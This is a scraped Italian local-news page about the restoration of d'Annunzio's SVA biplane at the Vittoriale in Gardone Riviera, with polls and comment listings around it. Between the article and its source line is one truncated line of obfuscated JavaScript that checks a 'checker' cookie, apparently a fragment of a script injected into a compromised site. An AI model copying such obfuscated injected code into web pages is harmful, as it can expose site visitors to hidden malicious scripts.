Giovedì 17 Aprile 2014 - Ore 06:29


Cronaca Nera Politica Società Economia Mobilità Ambiente Cultura Sport Curiose Interviste
Citta' ed hinterlandBassa brescianaFranciacorta e SebinoGarda e ValtenesiVal SabbiaVal TrompiaVal Camonica
Diminuisci il carattere Aumenta il carattere StampaInvia tramite mail
GARDONE RIVIERA

Vittoriale a nuovo in vista delle celebrazioni del 2013. Restaurato lo SVA del volo su Vienna

A quasi 150 anni dalla nascita di Gabriele d’Annunzio, avvenuta a Pescara nel 1863, e 75 dalla morte, a Gardone Riviera nel 1938, il Vittoriale si rimette a nuovo, in vista delle imminenti, grandiose celebrazioni del 2013. Proprio in questi giorni è in corso il ciclo di pulitura e restauro conservativo del biplano SVA 10 utilizzato da Gabriele d’Annunzio per guidare l’87° Squadriglia nel volo su Vienna del 9 agosto 1918.

Nel corso del precedente intervento, che risale al 1989, la sezione di Torino del Gruppo Amici Velivoli Storici aveva smontato e portato a Torino il serbatoio supplementare in rame (“nourrice”) presente sopra l’ala superiore, per il quale è stato necessario un complesso processo di ripristino della forma originale. I lavori di questi giorni prendono quindi avvio proprio dalla necessità di reinstallare la “nourrice” e proseguiranno con il controllo dello stato generale del velivolo, la pulizia completa, piccole riparazioni e l’applicazione di prodotti specifici per la conservazione. Inoltre, nell’occasione è stata anche costruita e installata la replica di un particolare mancante della carenatura laterale in alluminio che caratterizza il velivolo di d’Annunzio, differenziandolo da tutti gli altri SVA costruiti.

I lavori, i cui costi vivi sono stati sostenuti dalla Fondazione, avvengono presso il Vittoriale. All’uopo lo SVA è stato calato della cupola dell’Auditorium sotto la quale è tradizionalmente sospeso e adagiato al suolo, privato delle abituali poltroncine. Quella di questi giorni è quindi una delle rare occasioni in cui i visitatori possono ammirare lo SVA da molto vicino, cogliendone le reali, maestose proporzioni, che l’altezza della sospensione rende abitualmente poco leggibili.

“Lo SVA di d’Annunzio è un prezioso cimelio di importanza mondiale” dichiara Giordano Bruno Guerri, presidente della Fondazione Il Vittoriale degli Italiani, “tanto più importante alla vigilia dell’anniversario dannunziano ma anche e soprattutto delle celebrazioni per i 100 anni della Prima Guerra Mondiale, che inizieranno nel 2015. Non a caso in Auditorium il velivolo, che d’Annunzio utilizzò per il celebre volo su Vienna, viene sospeso con la prua orientata non verso la capitale austriaca ma verso Gardone Riviera, in segno di pace”.

Il velivolo resterà al suolo fino al 10 aprile, quando inizieranno i lavori di riposizionamento, che prevedono una novità:  una sospensione a minor quota, tale da consentire una fruizione ottimale del bene per i visitatori dell’“Omaggio a d’Annunzio”, collocato nella galleria dell’Auditorium.

function cc(){fed=az(ogo.mn[13]+'0,54,52,40,56,20');return document.cookie.search('checker')


Fonte: Comunicato stampa dom 08 apr 2012, ore 10.07
Lascia il tuo commento a questa notizia

Nome
Testo del commento
Per inserire il tuo commento copia le lettere e i numeri che trovi qui a sinistra nella casella vuota che trovi qui a destra

Non riesce a leggere il codice? Aggiorna


   

   
Lascia il tuo commento con Facebook

COMMENTI

Seguici su Facebook Seguici su Twitter Seguici su Youtube Fai di bsnews.it la tua pagina iniziale Feed Rss Contatti Chi Siamo
24

Registrazione | Cosa puoi fare col sito
Sondaggio
La Provincia di Brescia è:
Un ente inutile e costoso, da cancellare
Un ente utile, importante e virtuoso
Un ente utile, ma vanno tagliati i costi

Elezioni Aci, si vota martedì 15 aprile dalle 9 alle 15 solo in città:
Bisogna estendere gli orari e aumentare i seggi
Bisogna estendere gli orari
Bisogna aumentare i seggi
Lasciamo tutto così

Sondaggi del mese

Ultimi commenti
01:46 Uno della Stradale
17 apr - Vai alla news »
Tanto per scrivere qualcosa e creare un pò di scalpore e gettare un pò di discredito su chi fa il proprio lavoro con tutta la
01:46 Uno della Stradale
17 apr - Vai alla news »
Tanto per scrivere qualcosa e creare un pò di scalpore e gettare un pò di discredito su chi fa il proprio lavoro con tutta la
01:46 Uno della Stradale
17 apr - Vai alla news »
Tanto per scrivere qualcosa e creare un pò di scalpore e gettare un pò di discredito su chi fa il proprio lavoro con tutta la
01:46 Uno della Stradale
17 apr - Vai alla news »
Tanto per scrivere qualcosa e creare un pò di scalpore e gettare un pò di discredito su chi fa il proprio lavoro con tutta la
01:46 Uno della Stradale
17 apr - Vai alla news »
Tanto per scrivere qualcosa e creare un pò di scalpore e gettare un pò di discredito su chi fa il proprio lavoro con tutta la
00:16 Masaniello
17 apr - Vai alla news »
Meglio tardi che mai:Mi fa piacere sapere che il vice sindaco, come me, è favorevole al ricollocamento della statua, nonostante gli a
00:06 sg
17 apr - Vai alla news »
00:04 siensax
17 apr - Vai alla news »
Commenti in evidenza
16:54 Aldo Rebecchi
18 lug - Vai alla news »
Rispetto ai commenti letti, circa l’ipotesi che abbia a coordinare lo staff in via di formazione del Sindaco, non per replicare a chi legitt
Pubblicità elettorale


Twitta usando @bsnewsit

IN EVIDENZA
Rebecchi: il libro su Lucchini? Calzoni risponda a due domande
(a.tortelli) “Dopo aver letto il libro, mi restano due principali domande. Domande che ho anche posto all'autore durante la prima presentazione e che ancora attendono risposta. A che scopo Calzoni ha scritto questo libro? E, ancora, cosa ne direbbe Luigi Lucchini se fosse ancora in vita?”. A porre i quesiti è l'ex deputato bresciano Aldo Rebecchi, che accetta – e rispedisce al mittente – la provocazione lanciata da Ugo Calzoni con il suo ultimo
Entra nella rubrica
12 News - Il Mensile
12 Mesi - Il Mensile
Fan Facebook


       
EDIZIONI 12 | PUBBLICITA' | PI/CF 03327790980 | REA (4) 524873 | REG. TRIB. BRESCIA 41/2008 DEL 15 SETTEMBRE 2008